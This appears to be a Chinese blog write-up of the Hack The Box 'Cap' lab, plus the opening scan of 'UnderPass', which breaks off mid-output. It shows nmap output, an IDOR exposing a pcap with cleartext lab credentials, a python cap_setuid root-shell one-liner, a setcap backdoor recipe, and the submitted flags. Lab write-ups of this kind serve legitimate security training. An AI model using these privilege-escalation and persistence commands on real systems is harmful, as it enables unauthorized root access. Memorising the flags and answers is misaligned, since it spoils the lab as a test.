

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fuk.png">
  <link rel="icon" href="https://img.dkdun.cn/v1/2024/12/83e0272660805f52.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="butt3rf1y">
  <meta name="keywords" content="">
  
    <meta name="description" content="CapTask 1123456789101112┌──(root㉿butt3rf1y)-[&#x2F;HTB&#x2F;Machine&#x2F;Cap]└─# nmap -p- -T4 --min-rate&#x3D;1000 -sS -Pn 10.10.10.245Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2025-03-11 14:39 CSTNmap scan report">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-Cap &amp; UnderPass">
<meta property="og:url" content="http://example.com/2025/03/12/HTB-Cap-UnderPass/index.html">
<meta property="og:site_name" content="(｡･ω･｡)Welcome~">
<meta property="og:description" content="CapTask 1123456789101112┌──(root㉿butt3rf1y)-[&#x2F;HTB&#x2F;Machine&#x2F;Cap]└─# nmap -p- -T4 --min-rate&#x3D;1000 -sS -Pn 10.10.10.245Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2025-03-11 14:39 CSTNmap scan report">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/a8fafe0bc546ec32.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/8f2ffd0671c11359.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/752db83161eb57c2.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/957af3fac15cccef.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/9bf9e7ad7d96c4e2.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/8383c412e168bb97.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/8feb7134cf1276bb.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/a27a171a6902fb13.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/72c9eda786f794c5.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/5aa6f4d30ec762e8.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/d02a84fd82bca22c.png">
<meta property="article:published_time" content="2025-03-12T12:48:05.000Z">
<meta property="article:modified_time" content="2025-03-12T13:10:00.997Z">
<meta property="article:author" content="butt3rf1y">
<meta property="article:tag" content="HTB 渗透">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://img.dkdun.cn/v1/2025/12/a8fafe0bc546ec32.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>HTB-Cap &amp; UnderPass - (｡･ω･｡)Welcome~</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassBg.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":false,"loading_img":"/img/loading.gif","onlypost":true,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 80vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>butt3rf1y&#39;s Space</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="web_bg" style="
  background-image: url('https://img.dkdun.cn/v1/2025/12/ee5d8516e3530463.png');
  background-size: cover;
  background-position: center;
  background-attachment: fixed;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: -1;
"></div>

<div id="banner" class="banner" parallax=true
     style="background: url('https://img.dkdun.cn/v1/2025/12/ee5d8516e3530463.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.1)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="HTB-Cap &amp; UnderPass"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-03-12 20:48" pubdate>
          2025年3月12日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          11 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>


</div>

	<link rel="icon" href="https://img.dkdun.cn/v1/2024/12/e40f2f1a8320e35c.png" type="image/x-icon">
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">HTB-Cap &amp; UnderPass</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2025年3月12日 晚上
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <span id="more"></span>

<h1 id="Cap"><a href="#Cap" class="headerlink" title="Cap"></a>Cap</h1><h2 id="Task-1"><a href="#Task-1" class="headerlink" title="Task 1"></a>Task 1</h2><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs cmd">┌──(root㉿butt3rf1y)-[/HTB/Machine/Cap]<br>└─# nmap -p- -T4 --min-rate=<span class="hljs-number">1000</span> -sS -Pn <span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">245</span><br>Starting Nmap <span class="hljs-number">7</span>.<span class="hljs-number">94</span>SVN ( https://nmap.org ) <span class="hljs-built_in">at</span> <span class="hljs-number">2025</span>-<span class="hljs-number">03</span>-<span class="hljs-number">11</span> <span class="hljs-number">14</span>:<span class="hljs-number">39</span> CST<br>Nmap scan report <span class="hljs-keyword">for</span> <span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">245</span><br>Host is up (<span class="hljs-number">0</span>.<span class="hljs-number">30</span>s latency).<br><span class="hljs-keyword">Not</span> shown: <span class="hljs-number">65532</span> closed tcp ports (reset)<br>PORT   STATE SERVICE<br><span class="hljs-number">21</span>/tcp open  ftp<br><span class="hljs-number">22</span>/tcp open  ssh<br><span class="hljs-number">80</span>/tcp open  http<br><br>Nmap done: <span class="hljs-number">1</span> IP address (<span class="hljs-number">1</span> host up) scanned <span class="hljs-keyword">in</span> <span class="hljs-number">86</span>.<span class="hljs-number">05</span> seconds<br></code></pre></td></tr></table></figure>

<p>开着 21、22、80</p>
<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs inform7">How many TCP ports <span class="hljs-keyword">are</span> <span class="hljs-keyword">open</span>?<br>:3<br></code></pre></td></tr></table></figure>

<h2 id="Task-2"><a href="#Task-2" class="headerlink" title="Task 2"></a>Task 2</h2><p>访问 80 端口，侧边栏找到 <code>Security Snapshot</code> ，查看 url</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">After running <span class="hljs-keyword">a</span> <span class="hljs-string">&quot;Security Snapshot&quot;</span>, <span class="hljs-keyword">the</span> browser is redirected <span class="hljs-built_in">to</span> <span class="hljs-keyword">a</span> path <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> <span class="hljs-built_in">format</span> /[something]/[id], where [id] represents <span class="hljs-keyword">the</span> id <span class="hljs-built_in">number</span> <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> scan. What is <span class="hljs-keyword">the</span> [something]?<br>:data<br></code></pre></td></tr></table></figure>

<h2 id="Task-3"><a href="#Task-3" class="headerlink" title="Task 3"></a>Task 3</h2><p>查看侧边栏的 <code>Network Status</code> 发现还有其他 IP</p>
<p><img src="https://img.dkdun.cn/v1/2025/12/a8fafe0bc546ec32.png"></p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">Are you able <span class="hljs-keyword">to</span> <span class="hljs-built_in">get</span> <span class="hljs-keyword">to</span> other users<span class="hljs-string">&#x27; scans?</span><br><span class="hljs-string">:yes</span><br></code></pre></td></tr></table></figure>

<h2 id="Task-4"><a href="#Task-4" class="headerlink" title="Task 4"></a>Task 4</h2><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs applescript">What <span class="hljs-keyword">is</span> <span class="hljs-keyword">the</span> ID <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> PCAP <span class="hljs-built_in">file</span> <span class="hljs-keyword">that</span> <span class="hljs-keyword">contains</span> sensative data?<br>:<span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>

<h2 id="Task-5"><a href="#Task-5" class="headerlink" title="Task 5"></a>Task 5</h2><p>在 <code>http://10.10.10.245/data/0</code> 下载数据包</p>
<p><img src="https://img.dkdun.cn/v1/2025/12/8f2ffd0671c11359.png"></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">Which application layer protocol <span class="hljs-keyword">in</span> <span class="hljs-keyword">the</span> pcap <span class="hljs-built_in">file</span> can <span class="hljs-keyword">the</span> sensetive data be found <span class="hljs-keyword">in</span>?<br>:<span class="hljs-keyword">ftp</span><br></code></pre></td></tr></table></figure>

<h2 id="Task-6"><a href="#Task-6" class="headerlink" title="Task 6"></a>Task 6</h2><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs crmsh"><span class="hljs-keyword">USER</span> <span class="hljs-title">nathan</span><br>PASS Buck3tH4TF0RM3!<br></code></pre></td></tr></table></figure>

<p>ssh 也能用</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">W<span class="hljs-string">e&#x27;ve managed to collect nathan&#x27;</span>s FTP <span class="hljs-keyword">password</span>. <span class="hljs-keyword">On</span> what other service does this <span class="hljs-keyword">password</span> <span class="hljs-keyword">work</span>?<br>:ssh<br></code></pre></td></tr></table></figure>

<h2 id="Submit-User-Flag"><a href="#Submit-User-Flag" class="headerlink" title="Submit User Flag"></a>Submit User Flag</h2><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs cmd">ftp <span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">245</span><br>get user.txt<br></code></pre></td></tr></table></figure>

<p><img src="https://img.dkdun.cn/v1/2025/12/752db83161eb57c2.png"></p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs 1c">Submit the flag located in the nathan user&#x27;s home directory.<br>:<span class="hljs-number">12298311</span>c<span class="hljs-number">4131</span>1a3b59b<span class="hljs-number">4887</span>9e6c07ff<br></code></pre></td></tr></table></figure>

<h2 id="Task-8"><a href="#Task-8" class="headerlink" title="Task 8"></a>Task 8</h2><p>传一个 <code>linpeas.sh</code> 上去，在 <code>Capabilities</code> 下看到了 <code>/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip</code></p>
<p><img src="https://img.dkdun.cn/v1/2025/12/957af3fac15cccef.png"></p>
<p>还可以直接查找</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">getcap -r / <span class="hljs-number">2</span>&gt;/dev/null<br></code></pre></td></tr></table></figure>

<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">What <span class="hljs-keyword">is</span> the <span class="hljs-keyword">full</span> <span class="hljs-type">path</span> <span class="hljs-keyword">to</span> the binary <span class="hljs-keyword">on</span> this machine has special capabilities that can be abused <span class="hljs-keyword">to</span> obtain root <span class="hljs-keyword">privileges</span>?<br>:/usr/bin/python3<span class="hljs-number">.8</span><br></code></pre></td></tr></table></figure>

<h2 id="Submit-Root-Flag"><a href="#Submit-Root-Flag" class="headerlink" title="Submit Root Flag"></a>Submit Root Flag</h2><p>执行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">python3<span class="hljs-number">.8</span> -c <span class="hljs-string">&#x27;import os; os.setuid(0); os.system(&quot;/bin/bash&quot;)&#x27;</span><br></code></pre></td></tr></table></figure>

<p>进入 root 权限</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs 1c">Submit the flag located in root&#x27;s home directory.<br>:<span class="hljs-number">07860203</span>4d5abb<span class="hljs-number">9587</span>c86b9f<span class="hljs-number">7560</span>ab18<br></code></pre></td></tr></table></figure>

<h2 id="Capabilities"><a href="#Capabilities" class="headerlink" title="Capabilities"></a>Capabilities</h2><p><a target="_blank" rel="noopener" href="https://gtfobins.github.io/gtfobins/python/">https://gtfobins.github.io/gtfobins/python/</a></p>
<p>如果二进制文件具有 Linux <code>CAP_SETUID</code> 功能集或者具有功能集的另一个二进制文件执行，可以用作后门，通过操作自己的进程 UID 来维持权限访问</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs cmd">cp $(which python) .<br>sudo setcap cap_setuid+ep python<br><br>./python -c &#x27;import os; os.setuid(<span class="hljs-number">0</span>); os.system(&quot;/bin/sh&quot;)&#x27;<br></code></pre></td></tr></table></figure>

<p><code>Capabilities</code> 机制在 Linux 内核 2.2 之后引入，它将 root 用户权限细分为不同领域，可以禁用或启用。如果 euid 不是 root ，那么会检查是否具有特权操作所对应的 <code>Capabilities</code>，以此为依据来决定是否能执行权限操作，主要是针对 SUID 的权限控制</p>
<p>上述的 <code>CAP_SETUID</code> 就是改变进程的 uid(setuid(),setreuid(),setresuid() 等等) 对应的 capability </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os; os.setuid(<span class="hljs-number">0</span>); os.system(<span class="hljs-string">&quot;/bin/sh&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>更多详情可以看大佬们的博客：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/f-carey/p/16026088.html%EF%BC%8Chttps://rk700.github.io/2016/10/26/linux-capabilities/">https://www.cnblogs.com/f-carey/p/16026088.html，https://rk700.github.io/2016/10/26/linux-capabilities/</a></p>
<h1 id="UnderPass"><a href="#UnderPass" class="headerlink" title="UnderPass"></a>UnderPass</h1><h2 id="Submit-User-Flag-1"><a href="#Submit-User-Flag-1" class="headerlink" title="Submit User Flag"></a>Submit User Flag</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs cmd">└─# nmap -sS -sV -Pn -A <span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">11</span>.<span class="hljs-number">48</span><br>Starting Nmap <span class="hljs-number">7</span>.<span class="hljs-number">94</span>SVN ( https://nmap.org ) <span class="hljs-built_in">at</span> <span class="hljs-number">2025</span>-<span class="hljs-number">03</span>-<span class="hljs-number">12</span> <span class="hljs-number">17</span>:<span class="hljs-number">14</span> CST<br>Nmap scan report <span class="hljs-keyword">for</span> <span class="hljs-number">10</span>.<span class="hljs-number">10</span>.<span class="hljs-number">11</span>.<span class="hljs-number">48</span><br>Host is up (<span class="hljs-number">0</span>.<span class="hljs-number">33</span>s latency).<br><span class="hljs-keyword">Not</span> shown: <span class="hljs-number">998</span> closed tcp ports (reset)<br>PORT   STATE SERVICE VERSION<br><span class="hljs-number">22</span>/tcp open  ssh     OpenSSH <span class="hljs-number">8</span>.<span class="hljs-number">9</span>p1 Ubuntu <span class="hljs-number">3</span>ubuntu0.<span class="hljs-number">10</span> (Ubuntu Linux; protocol <span class="hljs-number">2</span>.<span class="hljs-number">0</span>)<br>| ssh-hostkey:<br>|   <span class="hljs-number">256</span> <span class="hljs-number">48</span>:b0:d2:c7:<span class="hljs-number">29</span>:<span class="hljs-number">26</span>:ae:<span class="hljs-number">3</span>d:fb:b7:<span class="hljs-number">6</span>b:<span class="hljs-number">0</span>f:f5:<span class="hljs-number">4</span>d:<span class="hljs-number">2</span>a:ea (ECDSA)<br>|_  <span class="hljs-number">256</span> cb:<span class="hljs-number">61</span>:<span class="hljs-number">64</span>:b8:<span class="hljs-number">1</span>b:<span class="hljs-number">1</span>b:b5:ba:b8:<span class="hljs-number">45</span>:<span class="hljs-number">86</span>:c5:<span class="hljs-number">16</span>:bb:e2:a2 (ED25519)<br><span class="hljs-number">80</span>/tcp open  http    Apache httpd <span class="hljs-number">2</span>.<span class="hljs-number">4</span>.<span class="hljs-number">52</span> ((Ubuntu))<br>|_http-server-header: Apache/<span class="hljs-number">2</span>.<span class="hljs-number">4</span>.<span class="hljs-number">52</span> (Ubuntu)<br>|_http-<span class="hljs-built_in">title</span>: Apache2 Ubuntu Default Page: It works<br>No exact OS matches <span class="hljs-keyword">for</span> host (<span class="hljs-keyword">If</span> you know what OS is running on it, see https://nmap.org/submit/ ).<br>TCP/IP fingerprint:<br><span class="hljs-function">OS:<span class="hljs-title">SCAN</span>(<span class="hljs-title">V</span>=7.94<span class="hljs-title">SVN</span>%<span class="hljs-title">E</span>=4%<span class="hljs-title">D</span>=3/12%<span class="hljs-title">OT</span>=22%<span class="hljs-title">CT</span>=1%<span class="hljs-title">CU</span>=41673%<span class="hljs-title">PV</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DS</span>=3%<span class="hljs-title">DC</span>=<span class="hljs-title">T</span>%<span class="hljs-title">G</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">TM</span>=67<span class="hljs-title">D1</span></span><br><span class="hljs-function"><span class="hljs-title">OS</span>:50<span class="hljs-title">C6</span>%<span class="hljs-title">P</span>=<span class="hljs-title">x86_64</span>-<span class="hljs-title">pc</span>-<span class="hljs-title">linux</span>-<span class="hljs-title">gnu</span>)<span class="hljs-title">SEQ</span>(<span class="hljs-title">SP</span>=<span class="hljs-title">FF</span>%<span class="hljs-title">GCD</span>=1%<span class="hljs-title">ISR</span>=106%<span class="hljs-title">TI</span>=<span class="hljs-title">Z</span>%<span class="hljs-title">CI</span>=<span class="hljs-title">Z</span>%<span class="hljs-title">II</span>=<span class="hljs-title">I</span>%<span class="hljs-title">TS</span>=<span class="hljs-title">A</span>)<span class="hljs-title">O</span></span><br><span class="hljs-function"><span class="hljs-title">OS:PS</span>(<span class="hljs-title">O1</span>=<span class="hljs-title">M53AST11NW7</span>%<span class="hljs-title">O2</span>=<span class="hljs-title">M53AST11NW7</span>%<span class="hljs-title">O3</span>=<span class="hljs-title">M53ANNT11NW7</span>%<span class="hljs-title">O4</span>=<span class="hljs-title">M53AST11NW7</span>%<span class="hljs-title">O5</span>=<span class="hljs-title">M53AS</span></span><br><span class="hljs-function"><span class="hljs-title">OS:T11NW7</span>%<span class="hljs-title">O6</span>=<span class="hljs-title">M53AST11</span>)<span class="hljs-title">WIN</span>(<span class="hljs-title">W1</span>=<span class="hljs-title">FE88</span>%<span class="hljs-title">W2</span>=<span class="hljs-title">FE88</span>%<span class="hljs-title">W3</span>=<span class="hljs-title">FE88</span>%<span class="hljs-title">W4</span>=<span class="hljs-title">FE88</span>%<span class="hljs-title">W5</span>=<span class="hljs-title">FE88</span>%<span class="hljs-title">W6</span>=<span class="hljs-title">FE88</span>)<span class="hljs-title">E</span></span><br><span class="hljs-function"><span class="hljs-title">OS:CN</span>(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DF</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">T</span>=40%<span class="hljs-title">W</span>=<span class="hljs-title">FAF0</span>%<span class="hljs-title">O</span>=<span class="hljs-title">M53ANNSNW7</span>%<span class="hljs-title">CC</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">Q</span>=)<span class="hljs-title">T1</span>(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DF</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">T</span>=40%<span class="hljs-title">S</span>=<span class="hljs-title">O</span>%<span class="hljs-title">A</span>=<span class="hljs-title">S</span>+%<span class="hljs-title">F</span></span><br><span class="hljs-function"><span class="hljs-title">OS</span>:=<span class="hljs-title">AS</span>%<span class="hljs-title">RD</span>=0%<span class="hljs-title">Q</span>=)<span class="hljs-title">T2</span>(<span class="hljs-title">R</span>=<span class="hljs-title">N</span>)<span class="hljs-title">T3</span>(<span class="hljs-title">R</span>=<span class="hljs-title">N</span>)<span class="hljs-title">T4</span>(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DF</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">T</span>=40%<span class="hljs-title">W</span>=0%<span class="hljs-title">S</span>=<span class="hljs-title">A</span>%<span class="hljs-title">A</span>=<span class="hljs-title">Z</span>%<span class="hljs-title">F</span>=<span class="hljs-title">R</span>%<span class="hljs-title">O</span>=%<span class="hljs-title">RD</span>=0%<span class="hljs-title">Q</span>=)<span class="hljs-title">T5</span></span><br><span class="hljs-function"><span class="hljs-title">OS</span>:(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DF</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">T</span>=40%<span class="hljs-title">W</span>=0%<span class="hljs-title">S</span>=<span class="hljs-title">Z</span>%<span class="hljs-title">A</span>=<span class="hljs-title">S</span>+%<span class="hljs-title">F</span>=<span class="hljs-title">AR</span>%<span class="hljs-title">O</span>=%<span class="hljs-title">RD</span>=0%<span class="hljs-title">Q</span>=)<span class="hljs-title">T6</span>(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DF</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">T</span>=40%<span class="hljs-title">W</span>=0%<span class="hljs-title">S</span>=<span class="hljs-title">A</span>%<span class="hljs-title">A</span>=<span class="hljs-title">Z</span></span><br><span class="hljs-function"><span class="hljs-title">OS</span>:%<span class="hljs-title">F</span>=<span class="hljs-title">R</span>%<span class="hljs-title">O</span>=%<span class="hljs-title">RD</span>=0%<span class="hljs-title">Q</span>=)<span class="hljs-title">T7</span>(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DF</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">T</span>=40%<span class="hljs-title">W</span>=0%<span class="hljs-title">S</span>=<span class="hljs-title">Z</span>%<span class="hljs-title">A</span>=<span class="hljs-title">S</span>+%<span class="hljs-title">F</span>=<span class="hljs-title">AR</span>%<span class="hljs-title">O</span>=%<span class="hljs-title">RD</span>=0%<span class="hljs-title">Q</span>=)<span class="hljs-title">U1</span>(<span class="hljs-title">R</span>=<span class="hljs-title">Y</span>%<span class="hljs-title">DF</span>=</span><br><span class="hljs-function"><span class="hljs-title">OS:N</span>%<span class="hljs-title">T</span>=40%<span class="hljs-title">IPL</span>=164%<span class="hljs-title">UN</span>=0%<span class="hljs-title">RIPL</span>=<span class="hljs-title">G</span>%<span class="hljs-title">RID</span>=<span class="hljs-title">G</span>%<span 